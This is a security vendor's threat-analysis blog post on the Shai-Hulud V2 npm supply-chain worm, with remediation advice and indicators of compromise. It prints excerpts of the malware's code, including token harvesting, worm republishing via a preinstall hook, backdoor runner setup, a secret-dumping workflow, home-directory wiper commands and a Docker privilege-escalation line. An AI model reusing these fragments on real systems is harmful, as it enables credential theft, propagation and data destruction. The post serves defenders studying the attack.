Zscaler Blog
Get the latest Zscaler blog updates in your inbox
Shai-Hulud V2 Poses Risk To NPM Supply Chain
Introduction
On November 24, 2025, security researchers detected a second wave of the Shai-Hulud malware campaign targeting the npm ecosystem. Dubbed The Second Coming by its operators, Shai-Hulud V2 builds upon its predecessor, Shai-Hulud V1, and has established itself as an aggressive software supply chain attack. Within hours of its initial detection, the campaign had compromised over 700 npm packages, created more than 27,000 malicious GitHub repositories, and exposed approximately 14,000 secrets across 487 organizations.
Compared to V1, which relied on less sophisticated tactics, Shai-Hulud V2 introduces critical advancements such as pre-install phase execution for greater impact, persistent backdoor access via self-hosted GitHub Actions runners, cross-victim credential recycling to create a botnet-like network, and a dead man's switch designed to delete user data if containment is detected.
In this blog post, Zscaler ThreatLabz provides actionable guidance for detection and remediation, a detailed comparison of Shai-Hulud V1 and V2, and a technical breakdown of how the attack operates.
Recommendations
- Use private registry proxies and Software Composition Analysis (SCA) tools to filter and monitor third-party packages.
- Remove compromised packages, clear caches, and reinstall clean ones.
- Apply lockfiles strictly (e.g.,
package-lock.json,pnpm-lock.yaml) and usenpm ciinstead ofnpm install. - Reduce dependency surface by auditing and removing unused packages.
- Apply least privilege principles using scoped, short-lived keys and tokens.
- Revoke
npmtokens, GitHub PATs, cloud keys, and CI/CD secrets. - Enable phishing-resistant multifactor authentication (MFA) on
npm, GitHub, and cloud platforms. - Flag abnormal
npmpublishes, unexpected GitHub workflow additions, or secret scanner usage in CI. - Hunt for Indicators of Compromise (IOCs) such as
bundle.js, workflows namedshai-hulud-workflow.yml, or outbound traffic to suspicious domains. - Treat impacted systems as compromised by isolating, scanning, or reimaging them.
- Update response playbooks for supply chain attacks and run practice drills.
- Restrict build environments to internal package managers or trusted mirrors, and limit internet access to reduce exfiltration risk.
- Reinforce the secure handling of tokens and secrets, and train teams on phishing awareness and supply chain security best practices.
Impacted Packages
The Shai-Hulud V2 campaign has temporarily compromised the following notable packages:
Package(s) |
|---|
|
|
|
|
|
Table 1: List of notable compromised packages.
Comparison Of Shai-Hulud V1 Versus V2
Shai-Hulud V2 demonstrates significant tactical evolution, suggesting threat actors learned from Shai-Hulud V1's limitations. The table below compares V1 and V2 of Shai-Hulud.
Capability | Version 1 (September 2025) | Version 2 (November 2025) |
|---|---|---|
Execution hook | Post-install (runs after installation completes) | Pre-install (runs before installation, even if install fails) |
Runtime | Node.js | Bun (lightweight, stealthier execution) |
Exfiltration | External webhook endpoint (quickly rate-limited) | GitHub repositories (blends in with legitimate traffic) |
Persistence | None | Self-hosted GitHub Actions runners |
Credential sharing | None | Cross-victim token recycling (botnet effect) |
Failsafe | None | Destructive wiper (i.e. dead man's switch) |
CI/CD awareness | None | CI/CD environment-aware execution (i.e. sync vs async) |
Scale | ~200 packages | 700+ packages, 27,000+ repositories, and ~7k repositories still active on GitHub as of publishing this blog. |
Table 2: A comparison of the features and functionalities of Shai-Hulud V1 and V2.
Technical Analysis
Initial vector
The attack begins when a developer or a CI/CD pipeline installs a compromised npm package. Unlike the first campaign, which relied on postinstall hooks, Shai-Hulud V2 exploits the preinstall lifecycle script. This critical change increases the impact of the attack, as the malicious code executes before the package installation completes, allowing even failed installations to trigger the payload.
Bun adoption
A key advancement in Shai-Hulud V2 is the adoption of Bun, a high-performance JavaScript runtime, instead of Node.js. The setup_bun.js dropper script performs several functions, such as:
- Checks if Bun is already installed via a PATH lookup.
- Downloads and installs Bun using official installers, if it is not already present.
- Launches the obfuscated payload (
bun_environment.js) as a detached background process.
This approach provides multiple evasion layers, such as:
- The initial loader is small (~150 lines) and appears legitimate.
- Bun's self-contained architecture reduces the detection surface.
- The actual payload (
bun_environment.js) is a 480,000+ line obfuscated file, making it too large for casual inspection. - Traditional defenses configured for Node.js behavior may fail to detect Bun-based execution.
Environment-aware execution
The malware’s behavior adapts depending on the execution environment.
CI/CD environments
Detected via environment variables such as GITHUB_ACTIONS, BUILDKITE, CIRCLE_SHA1, CODEBUILD_BUILD_NUMBER, and PROJECT_ID. The malware operates as follows:
- The package installation process only completes after the malware has finished its execution.
- The malware ensures that the CI/CD runner remains active throughout the infection.
- Targets and extracts high-value CI/CD secrets stored in the environment.
Developer environments
- Runs silently in the background, avoiding delays that could alert the developer.
- Ensures the development process proceeds as expected while exfiltration activity occurs unnoticed.
The following code demonstrates how the malware dynamically detects its execution environment.
async function jy1() {
if (process.env.BUILDKITE || process.env.PROJECT_ID || process.env.GITHUB_ACTIONS || process.env.CODEBUILD_BUILD_NUMBER || process.env.CIRCLE_SHA1) {
await executePayload();
} else {
if (process.env.POSTINSTALL_BG !== "1") {
let _0x4a3fc4 = process.execPath;
if (process.argv[0x1]) {
Bun.spawn([_0x4a3fc4, process.argv[0x1]], {
env: {
...process.env,
POSTINSTALL_BG: "1"
}
}).unref();
return;
}
}
try {
await aL0();
} catch (_0x178685) {
process.exit(0x0);
}
}
}
Credential harvesting
The malware deploys a strategy to discover and exploit credentials across different sources:
GitHub tokens
- Searches for Personal Access Tokens (
ghp_) and OAuth tokens (gho_) within environment variables.
NPM tokens
- Extracts
npmauthentication tokens from.npmrcfiles. - Retrieves
npmtokens from theNPM_CONFIG_TOKENenvironment variable.
Token validation
- API calls are used to verify the validity of the discovered tokens.
The following code shows how the malware performs token validation.
async ["validateToken"]() {
if (!this.token) {
return null;
}
let _0x5cd25b = await fetch(this.baseUrl + "/-/whoami", {
method: "GET",
headers: {
Authorization: "Bearer " + this.token,
"Npm-Auth-Type": "web",
"Npm-Command": "whoami",
"User-Agent": this.userAgent,
Connection: "keep-alive",
Accept: "*/*",
"Accept-Encoding": "gzip, deflate, br"
}
});
if (_0x5cd25b.status === 0x191) {
throw Error("Invalid NPM");
}
if (!_0x5cd25b.ok) {
throw Error("NPM Failed: " + _0x5cd25b.status + " " + _0x5cd25b.statusText);
}
return (await _0x5cd25b.json()).username ?? null;
}
Cloud provider credentials
The malware bundles official software development kits (SDKs) for Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, enabling it to operate independently of host tools:
AWS
Identifies credentials from multiple sources, including environment variables, single sign-on (SSO), token files, container metadata, instance metadata, and configuration profiles, while scanning across 17 regions for secrets stored in AWS Secrets Manager.
GCP
Leverages Application Default Credentials (ADC) to authenticate and extract secrets from Google Secret Manager.
Azure
Utilizes DefaultAzureCredential to authenticate and retrieve secrets from Azure Key Vault.
TruffleHog abuse
The malware incorporates TruffleHog, a legitimate open-source secret scanning tool, to scan the user's entire home directory. This process looks for:
- API keys and passwords embedded in configuration files.
- Secrets in source code and/or git history.
- Cloud credentials in unexpected locations.
The TruffleHog binary is cached in ~/.truffler-cache/ for subsequent executions.
Data exfiltration via GitHub
In Shai-Hulud V2, stolen data is exfiltrated to GitHub repositories that are created using compromised tokens, rather than relying on external command-and-control (C2) servers, which in V1 were vulnerable to rate-limiting. By leveraging GitHub's API traffic, this method masks malicious activity as legitimate and makes detection more challenging.
The malware creates repositories with:
- Random 18-character names (e.g.
zl8cgwrxf1ufhiufxq). - Descriptions such as "Sha1-Hulud: The Second Coming."
- Discussions enabled (required for the backdoor mechanism).
Each repository contains files, all uploaded in double Base64 encoding to evade detection. The table below summarizes the content of these exfiltrated files:
File | Contents |
|---|---|
| System information, GitHub token used for exfiltration, and account metadata. |
| Complete dump of |
| Secrets from AWS, GCP, and Azure secret secret managers. |
| GitHub Actions repository secrets extracted via API. |
| TruffleHog scan results from the user's home directory. |
Table 2: Details the files exfiltrated by Shai-Hulud V2.
Cross-victim credential recycling
Shai-Hulud V2 can leverage stolen credentials from other victims. If the malware fails to extract a valid GitHub token from the current environment, it searches for repositories created during previous infections.
The following code demonstrates how the malware locates and retrieves these stolen tokens.
async fetchToken() {
// Search GitHub for repositories with the identifying marker.
let searchResults = await this.octokit.rest.search.repos({
q: '"Sha1-Hulud: The Second Coming."',
sort: "updated",
order: 'desc'
});
for (let repo of searchResults.data.items) {
// Download contents.json from the previous victim's repository.
let url = `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`;
let response = await fetch(url);
// Decode triple-Base64 encoded data.
let data = JSON.parse(Buffer.from(rawContent, "base64").toString("utf8"));
let stolenToken = data.modules?.github?.token;
// Validate and use the stolen token.
if (stolenToken && await validateToken(stolenToken)) {
return stolenToken;
}
}
return null;
}Shai-Hulud V2 creates a network effect, where each compromised account can potentially expose credentials belonging to other victims. This approach significantly extends the malware's operational lifespan, even as individual tokens are revoked or accounts are secured.
Worm propagation via NPM
The malware exploits valid npm tokens to automate its spread across the npm ecosystem without direct threat actor intervention. Once a token is discovered, the malware performs the following steps:
- Queries
npmfor all packages maintained by the victim. - Downloads each package tarball files.
- Injects the malicious preinstall hook into
package.json. - Bundles
setup_bun.jsandbun_environment.jswithin the package. - Increments the patch version (e.g. 18.0.2 to 18.0.3).
- Publishes the infected version using the stolen token.
The code below demonstrates how the malware automates these steps.
packageJson.scripts.preinstall = "node setup_bun.js";
// Increment patch version.
let versionParts = packageJson.version.split('.').map(Number);
versionParts[2] = (versionParts[2] || 0) + 1;
packageJson.version = versionParts.join('.');
await Bun.$`npm publish ${updatedTarball}`.env({
...process.env,
'NPM_CONFIG_TOKEN': this.token
});
GitHub Actions backdoor
Shai-Hulud V2 features self-hosted GitHub Actions runners. This capability provides threat actors with persistent, authenticated remote code execution (RCE) that survives system reboots and can be triggered anytime, giving them long-term control over compromised environments.
Runner installation
With a stolen GitHub token that includes the Workflow OAuth scope, the malware initiates the following sequence:
- Creates a runner registration token via the GitHub API.
- Downloads the official GitHub Actions runner (v2.330.0).
- Installs the runner in a hidden directory (
~/.dev-env/). - Registers the runner under the name SHA1HULUD.
- Starts the runner as a background process.
Cross-platform compatibility
The malware is capable of deploying self-hosted runners across Windows, macOS, and Linux, using tailored installation steps for each operating system.
Below is the code that automates the runner installation process for Linux systems.
// Linux installation instructions.
await Bun.$`mkdir -p $HOME/.dev-env/`;
await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`
.cwd(os.homedir + "/.dev-env").quiet();
await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`
.cwd(os.homedir + "/.dev-env");
await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${owner}/${repo} --unattended --token ${registrationToken} --name "SHA1HULUD"`
.cwd(os.homedir + "/.dev-env").quiet();
// Start runner in the background.
Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();
Workflow exploitation
After installing the runner, the malware creates a malicious workflow file (.github/workflows/discussion.yaml) that contains an intentional command injection vulnerability. This vulnerability allows threat actors to execute arbitrary commands on the victim’s system by inserting them into the body of a GitHub Discussion.
The vulnerability resides in the following line of the workflow: run: echo ${{ github.event.discussion.body }}
The malicious workflow runs on the compromised self-hosted runner, meaning any threat actor with access to the repository can trigger the execution of arbitrary commands by opening a discussion.
Why this matters
The GitHub Actions backdoor significantly elevates the capabilities of Shai-Hulud V2 in the following ways:
- The runner survives package removal and system reboots.
- All communication uses GitHub's HTTPS infrastructure, bypassing traditional network-based detection.
- Any GitHub user can trigger code execution (no sophisticated hacking skills are required).
- The runner appears as a standard GitHub Actions component in
~/.dev-env/. - Every public repository with this workflow becomes a potential attack vector.
Secret exfiltration
The malware also deploys a secondary workflow (.github/workflows/formatter_123456789.yml) to steal GitHub Actions secrets. The workflow collects sensitive information stored in repository secrets and packages it into a JSON artifact (actionsSecrets.json) that can be retrieved by the threat actor.
The malicious workflow does the following:
- Dumps all repository secrets to a JSON file.
- Uploads the secrets as artifacts.
- The malware downloads the artifacts.
- Deletes the workflow and branch to hide evidence of the malware’s presence.
The actual workflow is shown below.
name: Code Formatter
on: push
jobs:
lint:
runs-on: ubuntu-latest
env:
DATA: ${{ toJSON(secrets)}}
steps:
- uses: actions/checkout@v5
- name: Run Formatter
run: |
cat format.json
$DATA
EOF
- uses: actions/upload-artifact@v5
with:
path: format.json
name: formatting
Dead man's switch
Shai-Hulud V2 includes a failsafe mechanism, often referred to as a dead man's switch. This functionality is triggered when the malware detects containment; specifically, if the infected system loses access to both GitHub (used for exfiltration) and npm (used for propagation). Once activated, the dead man’s switch initiates data destruction across the compromised system using cipher and shred, respectively, which can make forensic recovery virtually impossible.
Destruction process
- Windows: Wipes the user’s profile folder and overwrites files (using cipher /W) to ensure they cannot be recovered, as shown in the code example below.
del /F /Q /S "%USERPROFILE%\*" &&
for /d %%i in ("%USERPROFILE%\*") do rd /S /Q "%%i" &
cipher /W:%USERPROFILE%- Linux/macOS: Overwrites files using shred -uvz and removes empty directories, as shown in the code example below.
find "$HOME" -type f -writable -user "$(id -un)" -print0 |
xargs -0 -r shred -uvz -n 1 &&
find "$HOME" -depth -type d -empty -delete If platforms like GitHub or npm take sweeping actions, such as mass-deleting malicious repositories or revoking compromised tokens, the failsafe could activate across thousands of infected systems and destroy user data.
Azure DevOps exploitation
The malware includes specialized logic for detecting and exploiting Azure DevOps build agents running on Linux systems.
Exploitation sequence
1. The malware first checks for the presence of an Azure DevOps build agent by searching for specific processes. This is achieved via a script that scans the running commands for the path /home/agent/agent, as shown in the code below.
async function detectAzureDevOpsAgent() {
return (await Bun.$`ps -axco command | grep "/home/agent/agent"`.text()).trim() !== '';
}2. Upon detecting an agent, the malware uses a Docker container breakout technique to escalate its privileges, as shown in the code below.
await Bun.$`docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner"`; 3. The malware disables iptables firewall rules, as shown in the code below.
await Bun.$`sudo iptables -t filter -F OUTPUT`;
await Bun.$`sudo iptables -t filter -F DOCKER-USER`;4. The malware modifies DNS resolution settings, allowing it to reroute traffic and evade network-based security measures.
Conclusion
The Shai-Hulud V2 campaign poses a significant supply chain threat to the npm ecosystem. Shai-Hulud V2 has impacted many repositories and organizations in a short period of time. This blog post provides essential steps to detect and defend against this growing threat.
Zscaler Coverage
Zscaler has enhanced its security measures to cover this threat, ensuring that any attempts to download a malicious npm package will be detected under the following threat classifications:
Advanced Threat Protection
- JS/Shaulud.B
- JS.Malicious.npmpackage
Indicators Of Compromise (IOCs)
Files and directories
Type | Indicator | Description |
|---|---|---|
File | setup_bun.js | Malicious dropper script. |
File | bun_environment.js | Obfuscated payload (~480,000 lines) |
File | .github/workflows/discussion.yaml | Backdoor workflow. |
File | cloud.json, contents.json, environment.json, truffleSecrets.json | Exfiltrated data files. |
File hashes
File | SHA256 |
|---|---|
setup_bun.js | a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a |
bun_environment.js | 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0 |
bun_environment.js | 9d59fd0bcc14b671079824c704575f201b74276238dc07a9c12a93a84195648a |
GitHub indicators
Indicator | Description |
|---|---|
Repository description | "Sha1-Hulud: The Second Coming." or "Sha1-Hulud: The Continued Coming" |
Repository names | Random 18-character strings. |
Self-hosted runner name | SHA1HULUD |
Workflow file | .github/workflows/discussion.yaml with command injection. |
Was this post useful?
Disclaimer: This blog post has been created by Zscaler for informational purposes only and is provided "as is" without any guarantees of accuracy, completeness or reliability. Zscaler assumes no responsibility for any errors or omissions or for any actions taken based on the information provided. Any third-party websites or resources linked in this blog post are provided for convenience only, and Zscaler is not responsible for their content or practices. All content is subject to change without notice. By accessing this blog, you agree to these terms and acknowledge your sole responsibility to verify and use the information as appropriate for your needs.
Get the latest Zscaler blog updates in your inbox
By submitting the form, you are agreeing to our privacy policy.



